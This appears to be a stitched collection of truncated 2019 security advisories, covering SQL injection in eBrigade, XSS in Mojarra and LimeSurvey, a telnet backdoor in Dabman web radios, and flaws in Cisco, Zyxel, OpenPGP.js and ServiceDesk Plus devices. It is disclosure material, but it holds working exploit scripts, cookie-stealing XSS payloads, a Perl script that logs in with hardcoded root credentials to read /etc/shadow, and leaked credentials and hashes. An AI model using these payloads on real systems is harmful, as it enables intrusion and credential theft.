manipulate the SQL query with specially crafted requests resulting into a blind SQL injection, as described in one of the following vulnerabilities. a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744) The parameters of two links can be manipulated so any arbitrary query to any table or database can be added to the output of the resulting calendar files using the UNION functionality of SQL. c) Boolean-based Blind SQL Injection (CVE-2019-16745) The parameters of a search result can be manipulated to guess the returned values of an arbitrary query. Proof of concept: - 1) Multiple SQL Injection vulnerabilities All vulnerabilities were tested with an authenticated user with the lowest access rights (public). The whole PoC script requires an authenticated user for any functionality. The user is authenticated by a PHP session using the cookie PHPSESSID (may vary at different webservers). In conclusion, every request described below requires the PHP session cookie. a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743) The script evenement_ical.php uses the unsanitized parameter "evenement" to query the database. The results are written into a downloadable calendar file. By adding a UNION statement, an attacker can extend the output with arbitrary data of the database: The user input is read on line 42: $evenement=(isset($_GET['evenement'])?$_GET['evenement']:""); On line 88-89 it is added to the SQL statement: if ($evenement !="") $sql .= "\n and e.e_code = $evenement "; Which is executed and fetched in line 136 and 138: $res = mysqli_query($dbc,$sql); while($row=mysqli_fetch_array($res)){ Since e_code is of type integer, the proper sanitization method would be intval(). POC URL: evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- -> Version after 'LOCATION:' POC in Python: import requests import string import re url = input("URL without file (i.e. https://localhost/ebrigade): ") phpsession = input("PHPSESSID: ") cookies = {'PHPSESSID': phpsession} payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--' print("Testing vulnerability") r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload), cookies=cookies) matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE) print("Found version: {0}".format(matches[-1])) b) UNION SQL Injection in evenements.php (CVE-2019-16744) The script evenements.php uses the unsanitized para
SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 > === title: Reflected Cross-Site Scripting (XSS) product: Oracle Mojarra JSF included in Java EE 7 Eclipse Mojarra JSF vulnerable version: 2.2 & 2.3 fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING https://github.com/eclipse-ee4j/mojarra CVE number: - impact: Medium homepage: https://javaserverfaces.github.io/ found: 2018-11-12 by: Jean-Benjamin Rousseau (Office Zurich) Guillaume Crouquet (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "JavaServer Faces technology simplifies building user interfaces for JavaServer applications. Developers can build web applications by assembling reuseable UI components in a page; connecting these components to an application data source; and wiring client-generated events to server-side event handlers. This project provides information on the continued development of the JavaServer Faces specification. JavaServer Faces (JSF) is a JCP Standard technology for authoring component based user interfaces on the Java EE platform." Source: https://javaee.github.io/javaserverfaces-spec/ Business recommendation: By exploiting the vulnerability documented in this advisory, an attacker can execute arbitrary scripts in the context of the web application in the victim's browser. Besides performing arbitrary actions within the application with the victim's account or manipulating the application's interface, the attacker can potentially steal session tokens, redirect the victim to external pages and perform attacks against their browser. SEC Consult recommends users to implement the available patches. Vulnerability overview/description: --- The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 lacks input validation on the javax.faces.ClientWindow parameter which can lead to reflected cross-site scripting (XSS) under certain conditions. Mojarra JSF v2.2 and v2.3 are respectively the user interface standards for Java EE 7 and Java EE 8. The vulnerability is not directly exploitable in Mojarra JSF v2.2 and v2.3. However, different frameworks based on this library and having a custom implementation of the Faces-Request HTTP headers for AJAX requests might be affected. PrimeFaces v6.0 is one example of a vulnerable framework. This vulnerability affects the web applications fulfilling the following conditions: - Usage of a framework based on Mojarra JSF v2.2 or v2.3 - Usage of AJAX requests in the web applications - Custom implementation of the Faces-Request HTTP headers for AJAX requests - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter set to "url" in the web.xml file: javax.faces.CLIENT_WINDOW_MODE url Proof of concept: - In this proof of concept, the tests are based on PrimeFaces v6.0, an open source framework for JSF. Other frameworks based on Mojarra JSF 2.2 or 2.3 might also be affected. Step 1: Generate an AJAX request on the web application and intercept it. --- POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1 Host: $IP Content-Length: 405 Accept: application/xml, text/xml, */*; q=0.01 Origin: http://$IP X-Requested-With: XMLHttpRequest Faces-Request: partial/ajax Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163 Connection: close javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0 --- Step 2: Transpose the POST parameters into GET parameters and build a new URL with it. http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0 Step 3: Strip out the javax.faces.ViewState GET parameter from the URL. http://
SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > === title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: --- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: - 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20 src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey=1=xxx= xxx">=listquestions=question Vulnerable / tested versions: - The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. Vendor contact timeline: 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: - Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: --- No workaround available. Advisory URL: ----- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain
Dabman & Imperial (i) Web Radio Devices - Undocumented Telnet Backdoor & Command Execution Vulnerability
linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:9:7::: (decrypted: password & mldonkey) ftp:!:0:: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner http://93.234.141.215:80/set_dname?name=PWND> http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg> http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav=NAME> http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav=1> PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: === A fresh updated version is available by the manufacturer telestar to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624 Security Risk: == The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: == Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this
SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 > === title: Multiple vulnerabilities product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, Cisco 160W vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15 fixed version: see "Solution" CVE number: - impact: High homepage: https://www.cisco.com/ found: 2019-05-15 by: T. Weber, S. Viehböck (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Securely connecting your small business to the outside world is as important as connecting your internal network devices to one another. Cisco Small Business RV Series Routers offer virtual private networking (VPN) technology so your remote workers can connect to your network through a secure Internet pathway." Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html Business recommendation: We want to thank Cisco for the very quick and professional response and great coordination. Customers are urged to update the firmware of their devices. Vulnerability overview/description: --- 1) Hardcoded Credentials The device contains hardcoded users and passwords which can be used to login via SSH on an emulated device at least. During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions. 2) Known GNU glibc Vulnerabilities The used GNU glibc in version 2.19 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow") was verified by using the MEDUSA scalable firmware runtime. 3) Known BusyBox Vulnerabilities The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scaleable firmware runtime. 4) Multiple Vulnerabilities - IoT Inspector Report Further information can be found in IoT Inspector report: https://r.sec-consult.com/ciscoiot Proof of concept: - 1) Hardcoded Credentials The following hardcoded hashes were found in the 'shadow' file of the firmware: root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7::: debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7::: [...] The undocumented user 'debug-admin' is also contained in this file. Starting the dropbear daemon as background process on emulated firmware: --- # dropbear -E # [1109] Running in background # # [1112] Child connection from :52718 [1112] /var must be owned by user or root, and not writable by others [1112] Password auth succeeded for 'debug-admin' from :52718 --- Log on via another host connected to the same network. For this PoC the password of the debug-admin was changed in the 'shadow' file. --- [root@localhost medusa]# ssh debug-admin@ /bin/ash -i debug-admin@'s password: /bin/ash: can't access tty; job control turned off BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash) /tmp $ --- The 'debug-admin' user has the same privileges like 'root'. This can be determined from the corresponding sudoers file in the firmware: [...] ## User privilege specification ## root ALL=(ALL) ALL debug-admin ALL=(ALL) ALL ## Uncomment to allow members of group wheel to execute any command # %wheel ALL=(ALL) ALL [...] During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions. 2) Known GNU glibc Vulnerabilities GNU glibc version 2.19 contains multiple CVEs like: CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-87
SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 > === title: External DNS Requests product: Zyxel USG/UAG/ATP/VPN/NXC series vulnerable version: see "Vulnerable / tested version" fixed version: see "Solution" CVE number: - impact: medium homepage: https://www.zyxel.com found: 2019-06-19 by: Thomas Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Information Disclosure via Unauthenticated External DNS Requests A DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall. Proof of concept: - 1) Information Disclosure via Unauthenticated External DNS Requests By sending the following POST request an attacker can probe for the domain "subdomain.domain.com": --- POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 Host: 192.168.1.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 16 arip=subdomain.domain.com --- The following GET request can be used for the same purpose: --- GET /redirect.cgi?arip=subdomain.domain.com_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 Host: 192.168.1.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 Connection: close Cache-Control: max-age=0 --- If the domain can be resolved, the response contains the resolved IP address within the cookie value: --- HTTP/1.1 200 OK Date: Mon, 24 Jun 2019 08:14:33 GMT Cache-Control: no-cache, private Pragma: no-cache Expires: Mon, 16 Apr 1973 13:10:00 GMT Set-Cookie: arip=; path=/ Set-Cookie: zy_pc_browser=1; path=/ Connection: close Content-Type: text/html Content-Length: 9099 [...] --- If the domain cannot be resolved, a redirection will be returned: --- HTTP/1.1 302 Found Date: Mon, 24 Jun 2019 08:11:57 GMT Location: ext-js/app/view/login/useraware.html Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 [...] --- Vulnerable / tested versions: - The following versions have been tested, other versions might be affected as well: Zyxel USG110ZLD 4.33 Zyxel USG210ZLD 4.33 Zyxel USG310ZLD 4.33 Zyxel USG1100 ZLD 4.33 Zyxel USG1900 ZLD 4.33 Zyxel USG2200-VPN ZLD 4.33 Zyxel UAG2100 ZLD 4.18 Zyxel UAG4100 ZLD 4.18 The vendor provided the following list of affected devices: Zyxel ATP200
SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 > === title: Hardcoded FTP Credentials product: Zyxel NWA/NAP/WAC wireless access point series vulnerable version: see "Vulnerable / tested version" fixed version: see "Solution" CVE number: - impact: medium homepage: https://www.zyxel.com found: 2019-06-19 by: Thomas Weber (Office Vienna) IoT Inspector SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Hardcoded FTP Credentials An FTP service runs on the Zyxel wireless access point that contains the configuration file for the WiFi network. This FTP server can be accessed with hardcoded credentials that are embedded in the firmware of the AP. When the WiFi network is bound to another VLAN, an attacker can cross the network by fetching the credentials from the FTP server. The credentials were found by doing an automated scan with IoT Inspector. Proof of concept: - 1) Hardcoded FTP Credentials The username "devicehaecived" and the password "1234" can be used to access the FTP server of the AP on port 21. The content of the FTP server looks like the following listing: --- $ ls cert conf debug idp packet_trace script tmp wtp_image --- The directory "conf" contains all configuration files which store the WiFi SSIDs and passphrases. Vulnerable / tested versions: - The following versions have been manually tested and were automatically verified with IoT Inspector: Zyxel NWA5121-NI5.50 patch 0 and earlier Zyxel NWA5121-N 5.50 patch 0 and earlier The vendor provided the following list of affected devices: Zyxel WAC6103D-I5.50 patch 0 and earlier Zyxel WAC6303D-S5.50 patch 0 and earlier Zyxel WAC6502D-E5.50 patch 0 and earlier Zyxel WAC6502D-S5.50 patch 0 and earlier Zyxel WAC6503D-S5.50 patch 0 and earlier Zyxel WAC6553D-E5.50 patch 0 and earlier Zyxel WAC6552D-S5.50 patch 0 and earlier Zyxel WAC5302D-S5.50 patch 0 and earlier Zyxel NWA5123-AC5.50 patch 0 and earlier Zyxel NWA5123-AC HD 5.50 patch 0 and earlier Zyxel NWA5123-NI5.50 patch 0 and earlier Zyxel NWA5301-NJ5.50 patch 0 and earlier Zyxel NWA1302-AC5.50 patch 0 and earlier Zyxel NWA1123-ACv2 5.50 patch 0 and earlier Zyxel NWA1123-AC HD 5.50 patch 0 and earlier Zyxel NWA1123-AC PRO5.50 patch 0 and earlier Zyxel NAP1025.50 patch 0 and earlier Zyxel NAP2035.50 patch 0 and earlier Zyxel NAP3035.50 patch 0 and earlier Zyxel NAP3535.50 patch 0 and earlier Vendor contact timeline: 2019-06-26: Contacting vendor through secur...@zyxel.com.tw. 2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor confirmed receipt. 2019-07-03: Asked for an update; Vendor told that they
SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 > === title: Multiple Vulnerabilities product: OpenPGP.js vulnerable version: <=4.2.0 fixed version: 4.3.0 CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155 impact: critical homepage: https://openpgpjs.org/ found: 2018-2019 by: Wolfgang Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "This project aims to provide an Open Source OpenPGP library in JavaScript so it can be used on virtually every device. Instead of other implementations that are aimed at using native code, OpenPGP.js is meant to bypass this requirement (i.e. people will not have to install gpg on their machines in order to use the library). The idea is to implement all the needed OpenPGP functionality in a JavaScript library that can be reused in other projects that provide browser extensions or server applications. It should allow you to sign, encrypt, decrypt, and verify any kind of text - in particular e-mails - as well as managing keys." URL: https://openpgpjs.org/ Business recommendation: SEC Consult was tasked by the German Bundesamt für Sicherheit in der Informationstechnik (BSI) with conducting a security audit of the Mailvelope browser extension as well as the parts of OpenPGP.js used by Mailvelope. During the course of this audit multiple security vulnerabilities with severities ranging from minor to critical have been identified. Some of the vulnerabilities with higher severity are published as an advisory. A more detailed description of the vulnerabilities as well as a description of other vulnerabilities found during this project can be found in the report that has been made available by the BSI: https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html Vulnerability overview/description: --- 1) Message Signature Bypass (CVE-2019-9153) OpenPGP defines several types of signatures with each type carrying a different semantic. Signatures are implemented as packets and each signature packet can contain subpackets. To indicate a message signature (e.g. a signed e-mail), the signature type "text" is used. The text signature packet verifies both its subpackets as well as the signed text. During verification of a message signature, OpenPGP.js does not verify that the signature is of type text. An attacker could therefore construct a message that, instead of a text signature, contains a signature of another type. As the input required for the verification process depends on the signature type, an attacker could use a signature with a type that only verifies its subpackets and does not require additional input. An attacker could construct a message that contains a valid "standalone" or "timestamp" signature packet signed by another person. OpenPGP.js would incorrectly assume this message to be signed by that person. 2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154) OpenPGP signature subpackets contain information related to a signature (e.g. the creation timestamp). These subpackets may appear in a "hashed" and "unhashed" subpacket container. While the information in the hashed subpackets is signed, the unhashed subpackets are not cryptographically protected. OpenPGP.js however does not distinguish between these subpackets. When parsing a signature packet, the signed information is parsed first. When the unhashed packets are read, the information from the hashed packets is overwritten. An attacker could arbitrarily modify the contents of e.g. a key certification signature or revocation signature. As a result, the attacker could e.g. convince a victim to use an obsolete key for encryption. 3) Invalid Curve Attack (CVE-2019-9155) The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key exchange algorithm does not verify that the communication partner's public key is valid (i.e. that the point lies on the elliptic curve). This causes the application to implicitly calculate the resulting secret key not based on the specified elliptic curve but rather an altered curve. By carefully choosing multiple altered curves (and therefore the resulting public key), and observing whether decryption fails, an attacker can extract the victim's private key. This attack requires the attacker to be able to provide multiple manipulated messages and to observe whether decryption fails. Proof of concept: ---
SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 > === title: Unauthenticated sensitive information leakage product: Zoho Corporation ManageEngine ServiceDesk Plus vulnerable version: v10 <10509 fixed version: v10 >=10509 CVE number: CVE-2019-15045, CVE-2019-15046 impact: Critical homepage: https://www.manageengine.com/products/service-desk/ found: 2019-06-27 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike." Source: https://www.manageengine.com/products/service-desk/ Business recommendation: The vendor provides a patched version and it should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and further critical issues are to be expected. A workaround exists for mitigating vulnerability 1b (user enumeration). Vulnerability overview/description: --- 1) Unauthenticated sensitive information leakage a) Unauthenticated download of internal support ticket information (CVE-2019-15046) The software offers functionality (fosagent) that an unauthenticated attacker can exploit in order to gain information of internal "events". In our test it was possible to access sensitive internal information (tickets) written by users of this application in exchange with the support team. Depending on the contents of the tickets, sensitive data might leak through this functionality. It is likely, that it also depends on the configuration of ServiceDesk Plus which information is stored in those "events". b) User Enumeration in AjaxDomainServlet (CVE-2019-15045) It is possible to collect valid usernames by interacting with the "AjaxDomainServlet" function of the application without prior authentication. This vulnerability is useful to increase the efficiency of brute force attacks. If the username is known, it is easier to find the corresponding password. Furthermore, the servlet leaks information, whether the user is a locally configured or a domain user and it also leaks the internal domain names of the requested user account. According to the vendor, the affected feature is intended behaviour and a workaround in order to disable it has been provided (see further below). Proof of concept: - 1) Unauthenticated sensitive information leakage a) Unauthenticated download of internal support ticket information (CVE-2019-15046) The "fosagent" functionality provides a "download-file" servlet which an unauthenticated attacker can use in order to iterate through existing internal "events". The information that can be downloaded looks like internal ticket system information and other data exchanged between users and the help desk support team. It is necessary to supply the "log-pos" parameter given a number followed by a colon character and another number to access the corresponding event index. An attacker can just increment those numbers and access different information. https://$IP/fosagent/repl/download-file?log-pos=1:0 b) User Enumeration in AjaxDomainServlet (CVE-2019-15045) The following URL can be used to efficiently enumerate user accounts configured within ManageEngine ServiceDesk Plus. No prior authentication is required for this functionality. The "search" parameter is used for supplying the user account name. https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain=$USER If the user exists and is a local user (configured within the web application) it will show "Not in Domain" as a result. If the user exists and is a domain user (e.g. LDAP) it will show the corresponding internal domain name as a result. If the page stays empty the user does not exist. Vulnerable / tested versions: - Version 10 has been tested. The vendor did not confirm whether older releases are affected as well. Vendor contact timeline: 2019-07-02: Contacting vendor through ManageEngine Security Response Center (MESRC) Uploaded security ad
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
